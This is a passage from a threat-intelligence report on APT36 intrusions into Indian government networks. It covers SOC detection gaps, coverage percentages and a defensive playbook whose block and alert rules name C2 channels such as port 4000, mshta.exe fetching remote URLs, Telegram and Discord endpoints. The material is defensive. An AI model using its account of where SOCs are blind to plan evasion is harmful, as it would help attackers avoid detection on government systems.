Standard CSOC architecture monitors ingress/egress firewalls and email gateways only. Once APT36 establishes initial access, they have cleared the border. Internal east-west traffic — lateral movement, credential reuse, RDP pivoting — generates zero alerts because there is no east-west monitoring. DeskRAT’s recursive sweep from root (/) to exfiltrate files never crosses a monitored boundary.

F04 SIEM False-Positive Tsunami — Alert Fatigue as a Weapon

Typical Indian government SIEM deployments generate 2–5 million events per day with alert-to-investigation ratios exceeding 100:1. APT36 exploits this deliberately: their C2 traffic and exfiltration events are specifically designed to look like low-severity noise — a Python process making HTTP calls, a cron job running, a file being copied. Their malicious nature only emerges through behavioral correlation across multiple telemetry sources.

F05 Linux / BOSS OS Blind Spots

Enterprise EDR solutions are overwhelmingly designed for Windows. Linux server monitoring in Indian government environments is sparse — typically limited to syslog forwarding with no behavioral agent. DeskRAT’s four-vector persistence on BOSS Linux will generate no alert in a Windows-centric EDR deployment. Ares RAT can operate on back-end servers for months without triggering a single alert in a standard SOC stack.

F06 Compliance Theater — ISO 27001 / CERT-In Checkbox Syndrome

ISO 27001 certification requires documented controls and annual audits — not threat hunting, not behavioral analytics, not red team exercises against APT-simulated attacks. CISOs spending 80% of their time on compliance paperwork optimize for audit scores while the adversary optimizes for persistence. The 6-hour CERT-In mandatory reporting window becomes moot if your SOC cannot detect a Limepad exfiltration that has been running for months.

CSOC Detection Coverage vs APT36 Attack Vectors

  • Phishing / email lure detection: 62%
  • Windows signature-based EDR: 55%
  • Behavioural IOA detection: 35%
  • Linux / BOSS OS monitoring: 18%
  • C2 via Telegram / Slack / Google Drive: 12%
  • Android / mobile surveillance (CapraRAT): 8%
  • Supply chain / third-party monitoring: 5%
  • HUMINT / honey trap detection: 3%

12 Strategic Defense Playbook: Zero Trust to Agentic AI

12.1 — Immediate Actions (0–30 Days)

Action | Target | Defeats
Block outbound port 4000 on all government segments (cheap, but operators can move ports in a day; pair it with the WebSocket IOA) | Firewall / NGFW | DeskRAT C2
Alert on Python-urllib User-Agent from non-developer hosts | Proxy / SIEM | Limepad beaconing
Email gateway: LNK attachments >50KB = quarantine | Email security | Weaponized LNK chain
Alert on mshta.exe with a remote URL argument | EDR / Windows Defender ASR | HTA execution chain
Deploy FIDO2 hardware keys for all NIC / government email accounts | Identity / IAM | Fake Kavach portals, credential theft
Block api.telegram.org, discord.com from server network segments | Egress firewall | C2 over legitimate services
Block Contabo and Hostinger hosting ranges via TI feed (verify the current ASN assignments in a registry first; whole-ASN blocks also cut off legitimate tenants) | Firewall / TI feed | Dedicated C2 VPS

// REGULATORY CONTEXT — DPDPA 2023 + CERT-IN 6-HOUR WINDOW

India’s Digital Personal Data Protection Act 2023 is live and enforced. Any APT36 compromise of HR databases (for honey trap profiling), employee credential stores, or citizen data is a mandatory reportable breach. The CERT-In 6-hour reporting window means your SOC must detect, triage, and report within 6 hours of noticing the incident. DPDPA penalties and executive personal liability provisions make this a board-level risk, not an IT problem.


// Intelligence Sources

  • Seqrite Labs APT-Team — Operation Sindoor analysis, SideCopy multi-platform campaigns
  • CYFIRMA — APT36 profile, ClickFix analysis, YARA rules, DeskRAT campaign (Jun 2025)
  • Cisco Talos — InSideCopy detailed malware analysis
  • Zscaler ThreatLabz — Limepad first disclosure, Kavach malvertising
  • Sekoia — DeskRAT Golang campaign, stealth DNS analysis (Oct 2025)
  • QiAnXin XLab — StealthServer V1–V3 analysis (Oct 2025)
  • Aryaka Security — Geta RAT + Ares RAT cross-platform campaign (Feb 2026)
  • SOCRadar — APT36 dark web profile, historical campaigns
  • AttackIQ — Limepad attack graph, Suricata rules, MITRE mapping
  • CloudSEK — India Independence Day threat analysis (Aug 2025)
  • The Hacker News — Cross-platform espionage campaign coverage (Feb 2026)

TLP:AMBER — RESTRICTED // Report Date: 22 March 2026 // For authorized cybersecurity professionals only

Originally published on dhananjayrokde.wordpress.com · reproduced in full.
